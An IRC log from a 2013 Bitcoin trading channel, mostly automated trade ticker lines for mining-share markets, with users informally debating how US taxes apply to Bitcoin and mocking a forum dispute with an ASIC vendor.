and i wouldn't put it past them to ask NSA to store btc transactions and where they originated from Jun 19 20:55:10 guess i'll have to use shared send more Jun 19 20:55:25 [BTCTC] [TAT.VIRTUALMINE] 11 @ 0.005997 = 0.066 BTC [-] Jun 19 20:55:45 *to store -> to capture , i mean Jun 19 20:56:07 [BTCTC] [TAT.ASICMINER] 2 @ 0.0276 = 0.0552 BTC [+] Jun 19 20:56:36 http://www.forbes.com/sites/robertwood/2013/06/18/bitcoin-in-irs-crosshairs-says-government-report/ Jun 19 20:56:37 [BTCTC] [ASICMINER-PT] 1 @ 2.69999 BTC [+] Jun 19 20:56:58 Cue: "Bill is a Bitcoin miner. He successfully mines 25 Bitcoins. Bill may have earned taxable income from his mining activities." Jun 19 20:57:36 [BTCTC] [ASICMINER-PT] 1 @ 2.7 BTC [+] Jun 19 20:58:11 i just can't make the jump Jun 19 20:58:22 from BTC to a USD tax Jun 19 20:58:31 how does one even begin to determine that Jun 19 20:58:37 don't worry, they'll make the jump for you ;) Jun 19 20:58:40 ThickAsThieves: sale price Jun 19 20:58:43 [BTCTC] [TAT.ASICMINER] 2 @ 0.02809 = 0.0562 BTC [+] Jun 19 20:58:46 you pay the tax when you sell the btc Jun 19 20:58:53 thats what i said Jun 19 20:58:58 but we not discussing that Jun 19 20:58:59 and you cannot offset losses because its not a SEC recognized security Jun 19 20:59:04 like Jun 19 20:59:10 what about the sale of the shirt then? Jun 19 20:59:10 what if i get loads of BTC Jun 19 20:59:12 you dont pay taxes on mining Jun 19 20:59:14 and but Target gift cards Jun 19 20:59:14 you pay them on selling Jun 19 20:59:20 buy* Jun 19 20:59:23 ThickAsThieves: how did you get the btc? Jun 19 20:59:29 trading Jun 19 20:59:34 [BTCTC] [TAT.ASICMINER] 26 @ 0.0262 = 0.6812 BTC [-] Jun 19 20:59:34 btc assets Jun 19 20:59:37 because what you just described is money laundering depending on what Jun 19 20:59:45 trading from usd to btc back to usd? Jun 19 20:59:47 no Jun 19 20:59:51 all btc all the time Jun 19 20:59:57 theres no such thing ThickAsThieves Jun 19 21:00:01 the btc had to come from somewhere Jun 19 21:00:03 sorta is, Jun 19 21:00:10 i bought x BTC one day Jun 19 21:00:20 and i sold the same value in USD 2mos later Jun 19 21:00:31 lets say you buy btc at $10 then sell at $20 Jun 19 21:00:33 i am at zero in USD terms Jun 19 21:00:34 you owe taxes on that $10 Jun 19 21:00:46 [BTCTC] [TAT.VIRTUALMINE] 170 @ 0.005999 = 1.0198 BTC [+] Jun 19 21:00:49 yet i still have BTC left over Jun 19 21:00:51 or $10 to $30, you owe on that $30 Jun 19 21:00:52 er Jun 19 21:00:54 on that $20 Jun 19 21:01:03 ThickAsThieves: so wait Jun 19 21:01:07 you bought at $x and sold at $x? Jun 19 21:01:13 theres no taxes to be paid on that Jun 19 21:01:17 ok Jun 19 21:01:21 so now i have BTC left over Jun 19 21:01:25 and i grow rthat Jun 19 21:01:30 into more and more BTC Jun 19 21:01:35 then you owe taxes on those btc. Jun 19 21:01:37 thousands of em Jun 19 21:01:47 soon as they become USD in any form, you owe taxes Jun 19 21:01:53 what if they never do? Jun 19 21:02:02 then you dont owe taxes Jun 19 21:02:04 works the same on stocks Jun 19 21:02:10 buy stocks and never sell them? no taxes owed. Jun 19 21:02:10 what if i buy with BTC always Jun 19 21:02:19 buy physical gold and never sell them? no taxes owed. Jun 19 21:02:21 ThickAsThieves: yeah see Jun 19 21:02:23 i buy clothes and gizmos etc Jun 19 21:02:29 what if you buy a house for bitcoins that you mined in 2011 ? no taxes either? Jun 19 21:02:33 the guy you bought shit from with the btc? owes taxes. Jun 19 21:02:44 jurov the tax would be on the seller Jun 19 21:02:46 ThickAsThieves: and you may also still owe taxes Jun 19 21:02:47 when he converts Jun 19 21:02:56 ThickAsThieves: bartering does exist in the IRS tax code Jun 19 21:03:05 ^this Jun 19 21:03:06 [HAVELOCK] [ASICM] 25 @ 0.02709 = 0.6773 BTC [-] Jun 19 21:03:06 but this isnt bartering either Jun 19 21:03:10 it is Jun 19 21:03:11 its a foreign currency Jun 19 21:03:13 one asset for another Jun 19 21:03:17 except its NOT a foreign currency Jun 19 21:03:20 its not a currency at all Jun 19 21:03:20 of no nationality Jun 19 21:03:31 what is it then? Jun 19 21:03:31 the IRS nor the US Gov recognizes Bitcoin Jun 19 21:03:41 its a virtual asset Jun 19 21:03:43 this is the cruz of it Jun 19 21:03:43 ThickAsThieves: they do recognize it as tokens of value Jun 19 21:03:44 [HAVELOCK] [ASICM] 1 @ 0.02709 BTC [-] Jun 19 21:03:50 yes, what jurov said Jun 19 21:03:52 thus, it is subject to barter Jun 19 21:03:55 how can they tax something that has no USD value? Jun 19 21:03:56 there are laws covering bitcoin Jun 19 21:04:06 they also cover everything from wow gold to real non-monetary gold Jun 19 21:04:13 do they implement a Buyer's tax? Jun 19 21:04:14 ThickAsThieves: except it DOES have a USD value Jun 19 21:04:15 [BTCTC] [ASICMINER-PT] 1 @ 2.7 BTC [+] Jun 19 21:04:21 buyer's tax = sales tax Jun 19 21:04:25 ok Jun 19 21:04:26 which is collected by your state Jun 19 21:04:34 so whats the problem? Jun 19 21:04:55 you didnt pay sales tax Jun 19 21:05:03 its not your problem as much as the seller Jun 19 21:05:06 well, Jun 19 21:05:07 he needs to collect it Jun 19 21:05:18 seller is responsible for collecting sales tax Jun 19 21:05:21 not buyer Jun 19 21:05:21 you'll take them to court "butbutbut it has no usd value" they'll say "how many bitcoins do you pay your lawyer, again?" Jun 19 21:05:31 and dont give me that "well the internet" bullshit either, amazon is going to get their nuts trapped in a door jam soon enough Jun 19 21:05:38 [BTCTC] [TAT.VIRTUALMINE] 62 @ 0.005999 = 0.3719 BTC [+] Jun 19 21:05:40 so if i buy a target gift card, Jun 19 21:05:43 and there is sales tax Jun 19 21:05:49 the seller must cove rit in USD Jun 19 21:05:52 yes Jun 19 21:06:02 so again, no problem right? Jun 19 21:06:02 which means the seller must convert BTC to USD to do so Jun 19 21:06:07 ThickAsThieves: well it depends Jun 19 21:06:19 you still need to pay because you bartered Jun 19 21:06:41 if you buy 1 BTC at $20, and then trade it for a $30 gift card, you STILL owe taxes on the $10 difference. Jun 19 21:06:48 because its income. Jun 19 21:06:59 [HAVELOCK] [ASICM] 4 @ 0.02709 = 0.1084 BTC [-] Jun 19 21:07:14 [BTCTC] [TAT.ASICMINER] 1 @ 0.0263 BTC [+] Jun 19 21:07:51 so i suppose the answer is Jun 19 21:07:57 i need to track all my btc expenses Jun 19 21:08:04 as well Jun 19 21:08:08 Bitcoiners should just build a floating fortress and anchor it in the middle of the international waters. There, problems solved in the utopia of Liberty Island, where libertarians and trolls abound. (P.S. Please don't sign me up for it) Jun 19 21:08:13 now, depending on how you interpret the IRS rules, you only need to pay taxes after the first $500 Jun 19 21:08:29 and how the first $500 is defined requires a CPA. Jun 19 21:08:52 [BTCTC] [ASICMINER-PT] 1 @ 2.622 BTC [-] Jun 19 21:08:58 and how does all this work with being a BTC worker Jun 19 21:09:07 like, this is my main source of income now Jun 19 21:09:11 [BTCTC] [ASICMINER-PT] 1 @ 2.749 BTC [+] Jun 19 21:09:18 pls do read the tfa. it expressly says: Since many Bitcoin transactions are essentially bartering, the IRS can be expected to draw from its Bartering Tax Center. Jun 19 21:09:19 do i convert to USD and then pay myself through payroll? Jun 19 21:09:27 We could just move to a luxury/property tax system and get rid of all the complexity of the tax system for the general population. Jun 19 21:09:49 ThickAsThieves: well Jun 19 21:09:52 if you were working for a business Jun 19 21:09:57 and it was your business Jun 19 21:10:04 you could actually issue yourself a W2 Jun 19 21:10:08 with USD on it Jun 19 21:10:08 [BTCTC] [TAT.ASICMINER] 29 @ 0.0264 = 0.7656 BTC [+] Jun 19 21:10:16 but you'd need an actual corporation to do it that way Jun 19 21:10:19 [BTCTC] [ASICMINER-PT] 1 @ 2.7 BTC [-] Jun 19 21:10:49 i have such Jun 19 21:10:53 [BTCTC] [DMS.SELLING] 12 @ 0.0344 = 0.4128 BTC [-] Jun 19 21:11:06 and if own it, what if i pay myself dividends in BTC? Jun 19 21:11:24 ThickAsThieves: either way Jun 19 21:11:27 you keep track of BTC prices Jun 19 21:11:30 if you pay yourself 1 BTC today Jun 19 21:11:32 ;;ticker Jun 19 21:11:32 BTCUSD ticker | Best bid: 107.20634, Best ask: 107.50000, Bid-ask spread: 0.29366, Last trade: 107.83500, 24 hour volume: 26446.62807232, 24 hour low: 104.00000, 24 hour high: 110.98630, 24 hour vwap: 107.20768 Jun 19 21:11:38 you write down $107.20 Jun 19 21:11:39 that's a nightmate Jun 19 21:11:43 nightmare Jun 19 21:11:45 yes it is Jun 19 21:11:45 [BTCTC] [ASICMINER-PT] 40 @ 2.6221 = 104.884 BTC [-] Jun 19 21:11:47 its why no one does it Jun 19 21:11:49 also, not fair Jun 19 21:12:03 ThickAsThieves: seriously Jun 19 21:12:03 BTC value is not stable Jun 19 21:12:04 like Jun 19 21:12:08 we have an accountant here somewhere Jun 19 21:12:11 I forget his name Jun 19 21:12:16 the worlds first bitcoin accountant Jun 19 21:12:27 he makes a lot of money, you know why? because its difficult Jun 19 21:12:30 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.005998 BTC [-] Jun 19 21:12:53 [BTCTC] [TAT.ASICMINER] 18 @ 0.026322 = 0.4738 BTC [-] Jun 19 21:13:25 you mean smickles? he seems to be abducted by aliens or we Jun 19 21:13:29 whatever Jun 19 21:13:40 yeah him Jun 19 21:14:08 and even so Jun 19 21:14:15 just because he has a metho Jun 19 21:14:16 d Jun 19 21:14:19 doesnt make it correct Jun 19 21:14:26 being as there are no specific laws Jun 19 21:14:31 saying exactly what to do about this Jun 19 21:14:37 [BTCTC] [ASICMINER-PT] 1 @ 2.623 BTC [+] Jun 19 21:14:40 [BTCTC] [ASICMINER-PT] 1 @ 2.6223 BTC [-] Jun 19 21:14:55 Sounds easy enough to me. Each week you cash out some bitcoin, write in a spreadsheet "10 btc @ 107.2 = $1072.00" and then add them up at the end of the year Jun 19 21:15:12 what if i just cash it out and run a payroll Jun 19 21:15:15 to myself Jun 19 21:15:21 that covers plenty taxes Jun 19 21:15:55 if your company cashes out then the company does the bitcoin/usd accounting, then they pay you and use regular usd accounitng for payroll Jun 19 21:16:30 but somebody has to be doing the tracking of the usd/btc conversions Jun 19 21:16:33 [BTCTC] [ASICMINER-PT] 7 @ 2.62 = 18.34 BTC [-] Jun 19 21:16:40 doesn't the exchange do so? Jun 19 21:16:47 it's all in the hostory Jun 19 21:16:56 and i assume they will 1099 me or such Jun 19 21:16:58 what if salaries are paid out in bitcoins? all employees are obliged to do irs mess themselves? Jun 19 21:17:04 [BTCTC] [TAT.ASICMINER] 25 @ 0.02789 = 0.6973 BTC [+] Jun 19 21:17:37 [BTCTC] [S.DICE-PT] 50 @ 0.002402 = 0.1201 BTC [+] Jun 19 21:17:39 I don't think any of the current exchanges do 1099s yet Jun 19 21:17:59 so you have to do the accounting yourself and self report the income Jun 19 21:18:08 [BTCTC] [ASICMINER-PT] 1 @ 2.62 BTC [-] Jun 19 21:18:29 jurov yes, they each would have todo their own btc accounting Jun 19 21:19:07 [HAVELOCK] [ASICM] 1 @ 0.02709 BTC [-] Jun 19 21:19:29 imo, the gov should only be concerned about btc value when it is converted to usd Jun 19 21:19:39 [HAVELOCK] [ASICM] 1 @ 0.02709 BTC [-] Jun 19 21:19:43 it's the only time it actually has a USD value Jun 19 21:19:45 [BTCTC] [ASICMINER-PT] 1 @ 2.6221 BTC [+] Jun 19 21:19:46 [BTCTC] [TAT.ASICMINER] 47 @ 0.02789 = 1.3108 BTC [+] Jun 19 21:20:38 Your goods when bartering don't have a clear USD value until they're sold. They still tax barter. Jun 19 21:20:44 [MPEX] [S.MPOE] 15123 @ 0.00067863 = 10.2629 BTC [+] Jun 19 21:20:45 [MPEX] [S.MPOE] 177 @ 0.00067887 = 0.1202 BTC [+] Jun 19 21:20:58 if you use the btc to buy a $100 dollar watch, then the government sees that as 100 - (whatever you bought the btc for) worth of income Jun 19 21:21:19 [BTCTC] [ASICMINER-PT] 3 @ 2.6221 = 7.8663 BTC [+] Jun 19 21:22:23 and sales tax doesnt cover that? Jun 19 21:22:37 [BTCTC] [TAT.ASICMINER] 30 @ 0.026322 = 0.7897 BTC [-] Jun 19 21:22:38 they need to just implement a flat fucking tax Jun 19 21:22:53 its obnoxious to have two sides of tax on a barter Jun 19 21:23:05 and then get taxed on income Jun 19 21:23:10 etc etc Jun 19 21:23:11 [BTCTC] [ASICMINER-PT] 2 @ 2.61601 = 5.232 BTC [-] Jun 19 21:23:21 [BTCTC] [BASIC-MINING] 1 @ 0.68 BTC [+] Jun 19 21:23:33 The whole income tax system annoys me because it entails complex regulations that's put on the shoulder of everyone in the general public. It basically requires you to pay for an accountant to pay your due, unless you have a very basic income report to fill. Jun 19 21:23:58 Also just processing/sending so many tax returns... Jun 19 21:24:22 [BTCTC] [TAT.ASICMINER] 27 @ 0.02788 = 0.7528 BTC [+] Jun 19 21:25:36 [BTCTC] [BASIC-MINING] 1 @ 0.684999 BTC [+] Jun 19 21:25:37 [HAVELOCK] [ASICM] 5 @ 0.02709 = 0.1355 BTC [-] Jun 19 21:25:46 [BTCTC] [ASICMINER-PT] 1 @ 2.6221 BTC [+] Jun 19 21:25:47 And defining what is income can be difficult as well. Shouldn't we be able to subtract our time we put in from our salary to compute income? So my time is worth 20 $ an hour, and that is what I get paid, so my income should be 0? Jun 19 21:27:25 [BTCTC] [BASIC-MINING] 13 @ 0.689998 = 8.97 BTC [+] Jun 19 21:28:17 [BTCTC] [ASICMINER-PT] 1 @ 2.62211 BTC [+] Jun 19 21:28:46 [HAVELOCK] [ASICM] 15 @ 0.02708 = 0.4062 BTC [-] Jun 19 21:29:23 [BTCTC] [BASIC-MINING] 1 @ 0.698999 BTC [+] Jun 19 21:29:52 [HAVELOCK] [ASICM] 1 @ 0.027498 BTC [+] Jun 19 21:30:32 [BTCTC] [TAT.ASICMINER] 29 @ 0.0265 = 0.7685 BTC [-] Jun 19 21:31:09 [BTCTC] [ASICMINER-PT] 3 @ 2.6221 = 7.8663 BTC [-] Jun 19 21:31:18 [HAVELOCK] [ASICM] 9 @ 0.02749 = 0.2474 BTC [-] Jun 19 21:31:32 [BTCTC] [DMS.MINING] 1 @ 0.02 BTC [-] Jun 19 21:32:01 [BTCTC] [BASIC-MINING] 3 @ 0.699 = 2.097 BTC [+] Jun 19 21:32:34 [BTCTC] [ASICMINER-PT] 5 @ 2.6151 = 13.0755 BTC [-] Jun 19 21:32:42 hey Jun 19 21:32:42 [BTCTC] [TAT.ASICMINER] 2 @ 0.026322 = 0.0526 BTC [-] Jun 19 21:32:47 anybody here from bitbet.us [important] ? Jun 19 21:33:29 [BTCTC] [BASIC-MINING] 1 @ 0.7 BTC [+] Jun 19 21:33:50 [BTCTC] [TAT.ASICMINER] 96 @ 0.026276 = 2.5225 BTC [-] Jun 19 21:35:02 [BTCTC] [TAT.ASICMINER] 56 @ 0.026275 = 1.4714 BTC [-] Jun 19 21:35:07 peter1 "should" has no relationship to the tax code. Jun 19 21:35:09 [BTCTC] [BASIC-MINING] 1 @ 0.71 BTC [+] Jun 19 21:35:15 anybody? Jun 19 21:36:04 [BTCTC] [TAT.ASICMINER] 20 @ 0.026201 = 0.524 BTC [-] Jun 19 21:38:00 benkay: hey, I can wish, can't I? (I think you replaced the 'l' with a '1', should be a little 'L') Jun 19 21:38:19 [HAVELOCK] [ASICM] 9 @ 0.02749 = 0.2474 BTC [-] Jun 19 21:38:27 [BTCTC] [TAT.ASICMINER] 6 @ 0.0263 = 0.1578 BTC [+] Jun 19 21:38:39 [HAVELOCK] [ASICM] 1 @ 0.02749 BTC [-] Jun 19 21:38:55 [BTCTC] [TAT.ASICMINER] 53 @ 0.0262 = 1.3886 BTC [-] Jun 19 21:38:59 [BTCTC] [TAT.ASICMINER] 38 @ 0.026 = 0.988 BTC [-] Jun 19 21:40:51 [BTCTC] [B.YABMC] 2 @ 0.012 = 0.024 BTC [+] Jun 19 21:40:53 [BTCTC] [DMS.PURCHASE] 55 @ 0.054499 = 2.9974 BTC [-] Jun 19 21:41:16 [BTCTC] [ASICMINER-PT] 1 @ 2.65 BTC [+] Jun 19 21:41:39 let's make a movie! Jun 19 21:41:45 [BTCTC] [TAT.ASICMINER] 1 @ 0.027499 BTC [+] Jun 19 21:43:54 [BTCTC] [S.DICE-PT] 5 @ 0.002717 = 0.0136 BTC [+] Jun 19 21:43:57 [BTCTC] [RSM] 5 @ 0.02 = 0.1 BTC [+] Jun 19 21:44:24 [HAVELOCK] [ASICM] 1 @ 0.02749 BTC [-] Jun 19 21:45:16 [HAVELOCK] [ASICM] 80 @ 0.02749 = 2.1992 BTC [-] Jun 19 21:45:24 [HAVELOCK] [ASICM] 142 @ 0.0274949 = 3.9043 BTC [+] Jun 19 21:45:31 [HAVELOCK] [ASICM] 53 @ 0.027495 = 1.4572 BTC [+] Jun 19 21:45:37 [HAVELOCK] [ASICM] 40 @ 0.0275 = 1.1 BTC [+] Jun 19 21:45:51 [HAVELOCK] [ASICM] 100 @ 0.0275 = 2.75 BTC [+] Jun 19 21:45:57 [BTCTC] [COGNITIVE] 1 @ 0.314902 BTC [+] Jun 19 21:46:20 [BTCTC] [TAT.ASICMINER] 3 @ 0.0266 = 0.0798 BTC [-] Jun 19 21:46:33 [BTCTC] [ASICMINER-PT] 2 @ 2.65 = 5.3 BTC [+] Jun 19 21:46:41 [HAVELOCK] [ASICM] 85 @ 0.0285 = 2.4225 BTC [+] Jun 19 21:46:46 [BTCTC] [TAT.ASICMINER] 1 @ 0.027449 BTC [+] Jun 19 21:47:26 [BTCTC] [ASICMINER-PT] 1 @ 2.66 BTC [+] Jun 19 21:48:31 [BTCTC] [TAT.ASICMINER] 2 @ 0.02661 = 0.0532 BTC [-] Jun 19 21:48:50 [BTCTC] [TAT.ASICMINER] 33 @ 0.0265 = 0.8745 BTC [-] Jun 19 21:49:58 ar290: ask kakobrekla Jun 19 21:50:57 literally just messaged him Jun 19 21:51:11 [BTCTC] [DMS.MINING] 27 @ 0.02 = 0.54 BTC [-] Jun 19 21:52:08 [BTCTC] [DMS.MINING] 75 @ 0.02034 = 1.5255 BTC [+] Jun 19 21:52:27 [HAVELOCK] [ASICM] 2 @ 0.0284999 = 0.057 BTC [-] Jun 19 21:52:45 [BTCTC] [TAT.ASICMINER] 3 @ 0.027399 = 0.0822 BTC [+] Jun 19 21:53:34 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.005999 = 0.018 BTC [+] Jun 19 21:53:51 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.005999 = 0.03 BTC [+] Jun 19 21:54:17 [BTCTC] [TAT.ASICMINER] 1 @ 0.027399 BTC [+] Jun 19 21:55:26 [BTCTC] [TAT.ASICMINER] 37 @ 0.0268 = 0.9916 BTC [-] Jun 19 21:56:27 [BTCTC] [TAT.ASICMINER] 8 @ 0.0268 = 0.2144 BTC [-] Jun 19 21:56:30 [BTCTC] [COGNITIVE] 4 @ 0.314937 = 1.2597 BTC [+] Jun 19 21:57:15 [BTCTC] [ASICMINER-PT] 1 @ 2.650001 BTC [-] Jun 19 21:57:56 [BTCTC] [TAT.ASICMINER] 38 @ 0.0268 = 1.0184 BTC [-] Jun 19 21:57:57 [HAVELOCK] [ASICM] 1 @ 0.0282 BTC [-] Jun 19 21:58:24 [BTCTC] [TAT.ASICMINER] 25 @ 0.0267 = 0.6675 BTC [-] Jun 19 21:58:28 [BTCTC] [TAT.VIRTUALMINE] 11 @ 0.005999 = 0.066 BTC [+] Jun 19 21:58:31 [HAVELOCK] [ASICM] 2 @ 0.028 = 0.056 BTC [-] Jun 19 21:59:10 [BTCTC] [TAT.ASICMINER] 3 @ 0.0268 = 0.0804 BTC [+] Jun 19 21:59:23 [HAVELOCK] [ASICM] 93 @ 0.028 = 2.604 BTC [-] Jun 19 22:00:08 [HAVELOCK] [ASICM] 1 @ 0.028 BTC [-] Jun 19 22:01:19 [BTCTC] [ASICMINER-PT] 1 @ 2.65 BTC [-] Jun 19 22:01:28 [BTCTC] [ASICMINER-PT] 1 @ 2.631 BTC [-] Jun 19 22:01:35 [BTCTC] [ASICMINER-PT] 1 @ 2.6301 BTC [-] Jun 19 22:01:38 [BTCTC] [ASICMINER-PT] 1 @ 2.63001 BTC [-] Jun 19 22:01:42 [BTCTC] [ASICMINER-PT] 1 @ 2.630002 BTC [-] Jun 19 22:01:47 [BTCTC] [ASICMINER-PT] 6 @ 2.63 = 15.78 BTC [-] Jun 19 22:01:51 [BTCTC] [ASICMINER-PT] 1 @ 2.6202 BTC [-] Jun 19 22:01:55 [BTCTC] [ASICMINER-PT] 1 @ 2.6201 BTC [-] Jun 19 22:01:59 [BTCTC] [ASICMINER-PT] 2 @ 2.62 = 5.24 BTC [-] Jun 19 22:02:02 [BTCTC] [ASICMINER-PT] 1 @ 2.619 BTC [-] Jun 19 22:02:06 [BTCTC] [ASICMINER-PT] 9 @ 2.6151 = 23.5359 BTC [-] Jun 19 22:02:28 [HAVELOCK] [HIM] 1 @ 0.2899999 BTC [+] Jun 19 22:02:34 [BTCTC] [ASICMINER-PT] 1 @ 2.697 BTC [+] Jun 19 22:02:36 [HAVELOCK] [HIM] 1 @ 0.2899999 BTC [+] Jun 19 22:03:33 [BTCTC] [TAT.ASICMINER] 12 @ 0.0268 = 0.3216 BTC [+] Jun 19 22:03:40 [BTCTC] [TAT.ASICMINER] 12 @ 0.026621 = 0.3195 BTC [-] Jun 19 22:05:23 [BTCTC] [DMS.SELLING] 3 @ 0.0344 = 0.1032 BTC [-] Jun 19 22:05:30 [BTCTC] [DMS.SELLING] 78 @ 0.0343 = 2.6754 BTC [-] Jun 19 22:09:00 [BTCTC] [TAT.ASICMINER] 1 @ 0.027387 BTC [+] Jun 19 22:10:02 [HAVELOCK] [ASICM] 3 @ 0.0282 = 0.0846 BTC [+] Jun 19 22:11:52 [HAVELOCK] [ASICM] 2 @ 0.0281 = 0.0562 BTC [-] Jun 19 22:11:57 [BTCTC] [RSM] 16 @ 0.02 = 0.32 BTC [+] Jun 19 22:12:05 [BTCTC] [TAT.ASICMINER] 18 @ 0.02738 = 0.4928 BTC [-] Jun 19 22:12:09 [HAVELOCK] [ASICM] 26 @ 0.02731 = 0.7101 BTC [-] Jun 19 22:12:41 [HAVELOCK] [ASICM] 11 @ 0.0285 = 0.3135 BTC [+] Jun 19 22:14:35 [BTCTC] [MININGCO.ETF] 1 @ 0.8199 BTC [+] Jun 19 22:15:48 hahaha golden... and rather unexpected end: https://bitcointalk.org/index.php?topic=236794.msg2517566#msg2517566 Jun 19 22:17:10 [BTCTC] [DMS.MINING] 1 @ 0.020359 BTC [+] Jun 19 22:17:18 [BTCTC] [TAT.ASICMINER] 32 @ 0.027299 = 0.8736 BTC [-] Jun 19 22:18:03 [BTCTC] [TAT.ASICMINER] [PAID] 68,175 @ 0.00017196 (processing) Jun 19 22:18:23 [BTCTC] [ASICMINER-PT] 1 @ 2.63 BTC [-] Jun 19 22:18:27 [BTCTC] [ASICMINER-PT] 2 @ 2.62 = 5.24 BTC [-] Jun 19 22:19:50 [HAVELOCK] [ASICM] 1 @ 0.028 BTC [-] Jun 19 22:20:06 [HAVELOCK] [ASICM] 10 @ 0.0280999 = 0.281 BTC [+] Jun 19 22:20:14 [HAVELOCK] [ASICM] 10 @ 0.0280999 = 0.281 BTC [+] Jun 19 22:20:22 [HAVELOCK] [ASICM] 6 @ 0.0280999 = 0.1686 BTC [+] Jun 19 22:20:30 [HAVELOCK] [ASICM] 1 @ 0.0281 BTC [+] Jun 19 22:21:12 [BTCTC] [TAT.ASICMINER] 3 @ 0.027297 = 0.0819 BTC [-] Jun 19 22:22:00 [BTCTC] [TAT.ASICMINER] 1 @ 0.027296 BTC [-] Jun 19 22:26:17 [BTCTC] [TAT.ASICMINER] 2 @ 0.027296 = 0.0546 BTC [-] Jun 19 22:31:27 [BTCTC] [TAT.ASICMINER] 250 @ 0.02661 = 6.6525 BTC [-] Jun 19 22:31:34 [BTCTC] [TAT.ASICMINER] 20 @ 0.0266 = 0.532 BTC [-] Jun 19 22:31:38 [BTCTC] [TAT.ASICMINER] 1 @ 0.0265 BTC [-] Jun 19 22:31:43 [BTCTC] [TAT.ASICMINER] 12 @ 0.026 = 0.312 BTC [-] Jun 19 22:31:53 [BTCTC] [TAT.ASICMINER] 22 @ 0.026 = 0.572 BTC [-] Jun 19 22:32:03 [BTCTC] [TAT.ASICMINER] 3 @ 0.02663 = 0.0799 BTC [+] Jun 19 22:32:37 [BTCTC] [TAT.VIRTUALMINE] 12 @ 0.005998 = 0.072 BTC [-] Jun 19 22:32:39 [HAVELOCK] [ASICM] 4 @ 0.0280999 = 0.1124 BTC [-] Jun 19 22:32:40 [HAVELOCK] [ASICM] 23 @ 0.02801 = 0.6442 BTC [-] Jun 19 22:32:41 [HAVELOCK] [ASICM] 323 @ 0.028001 = 9.0443 BTC [-] Jun 19 22:33:01 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.005999 = 0.012 BTC [+] Jun 19 22:33:46 [BTCTC] [TAT.ASICMINER] 3 @ 0.02661 = 0.0798 BTC [-] Jun 19 22:33:59 [BTCTC] [RSM] 4 @ 0.021 = 0.084 BTC [+] Jun 19 22:35:30 [BTCTC] [ASICMINER-PT] 1 @ 2.688999 BTC [+] Jun 19 22:35:32 jurov this is epic entertainment, thanks! Jun 19 22:35:46 [BTCTC] [ASICMINER-PT] 1 @ 2.689 BTC [+] Jun 19 22:36:08 [BTCTC] [TAT.ASICMINER] 1 @ 0.02661 BTC [-] Jun 19 22:36:15 [BTCTC] [TAT.ASICMINER] 23 @ 0.02661 = 0.612 BTC [-] Jun 19 22:36:52 [BTCTC] [ASICMINER-PT] 1 @ 2.695 BTC [+] Jun 19 22:37:43 [BTCTC] [ASICMINER-PT] 1 @ 2.697 BTC [+] Jun 19 22:37:48 [BTCTC] [ASICMINER-PT] 3 @ 2.699 = 8.097 BTC [+] Jun 19 22:38:02 [BTCTC] [TAT.ASICMINER] 5 @ 0.027279 = 0.1364 BTC [+] Jun 19 22:38:25 [HAVELOCK] [ASICM] 2 @ 0.0281 = 0.0562 BTC [+] Jun 19 22:38:44 reading now Jun 19 22:38:47 [BTCTC] [ASICMINER-PT] 5 @ 2.709 = 13.545 BTC [+] Jun 19 22:38:47 fun so far! Jun 19 22:38:53 [BTCTC] [ASICMINER-PT] 1 @ 2.7369 BTC [+] Jun 19 22:38:59 [BTCTC] [ASICMINER-PT] 5 @ 2.737 = 13.685 BTC [+] Jun 19 22:39:10 [BTCTC] [ASICMINER-PT] 6 @ 2.739 = 16.434 BTC [+] Jun 19 22:39:14 [BTCTC] [ASICMINER-PT] 33 @ 2.74 = 90.42 BTC [+] Jun 19 22:40:07 [BTCTC] [TAT.ASICMINER] 1 @ 0.027278 BTC [-] Jun 19 22:40:14 [BTCTC] [ASICMINER-PT] 2 @ 2.74 = 5.48 BTC [+] Jun 19 22:40:26 [HAVELOCK] [ASICM] 1 @ 0.0281 BTC [+] Jun 19 22:41:22 [HAVELOCK] [ASICM] 5 @ 0.0281 = 0.1405 BTC [+] Jun 19 22:41:30 [BTCTC] [ASICMINER-PT] 1 @ 2.74 BTC [+] Jun 19 22:41:43 [HAVELOCK] [ASICM] 10 @ 0.028001 = 0.28 BTC [-] Jun 19 22:41:47 [BTCTC] [ASICMINER-PT] 1 @ 2.74 BTC [+] Jun 19 22:41:55 [BTCTC] [ASICMINER-PT] 2 @ 2.7479 = 5.4958 BTC [+] Jun 19 22:42:42 [BTCTC] [ASICMINER-PT] 1 @ 2.74 BTC [-] Jun 19 22:42:49 [BTCTC] [ASICMINER-PT] 1 @ 2.7479 BTC [+] Jun 19 22:42:54 tits, what a great read. i feel so lucky to not be one of those asshats. helps me remember I have no problems but imagined first world problems. Jun 19 22:43:43 if i had an order, i'd cancel it anyway Jun 19 22:43:46 [HAVELOCK] [ASICM] 9 @ 0.028 = 0.252 BTC [-] Jun 19 22:43:51 this is obnoxious Jun 19 22:43:53 [HAVELOCK] [ASICM] 19 @ 0.028 = 0.532 BTC [-] Jun 19 22:44:09 i know, i wanted to stab him after the apology thing Jun 19 22:44:11 what a twat Jun 19 22:44:15 [BTCTC] [TAT.ASICMINER] 5 @ 0.02727 = 0.1364 BTC [-] Jun 19 22:44:25 but Garr can't Jun 19 22:44:27 poor Garr25, gotta suck dick to keep his business in order Jun 19 22:44:31 sucks Jun 19 22:44:32 he has an asset to run Jun 19 22:44:56 scary to have your bread and butter in the hands of BFL. i wouldn't be able to sleep. Jun 19 22:45:06 i also can;t believe some people still wanna whip him afte rthe apology Jun 19 22:45:09 [HAVELOCK] [ASICM] 1 @ 0.027443 BTC [-] Jun 19 22:45:11 [HAVELOCK] [ASICM] 99 @ 0.027453 = 2.7178 BTC [+] Jun 19 22:45:12 [BTCTC] [TAT.ASICMINER] 20 @ 0.02727 = 0.5454 BTC [-] Jun 19 22:45:27 no I want to stab Josh, not garr. Jun 19 22:46:04 i know Jun 19 22:46:06 ok Jun 19 22:46:08 i'm saying Jun 19 22:46:16 some people actually wanna keep whipping Garr Jun 19 22:46:20 lmao Jun 19 22:46:22 it's insane Jun 19 22:46:23 puppets Jun 19 22:46:27 "Garr, you can officially piss off at this point and take your accusations and stick them straight up your ass. I tried to be nice and I wanted to help you and you give me all sorts of shit and accusations. This is why we no longer give a shit about this forum; Everyone here is monumental assholes, no matter how accommodating one tries to be. Garr, you'll get your order when it Jun 19 22:46:27 comes up in the queue, I'm done looking into your problems or trying to help you." Jun 19 22:47:05 its laughable Jun 19 22:47:53 [BTCTC] [TAT.ASICMINER] 19 @ 0.027278 = 0.5183 BTC [+] Jun 19 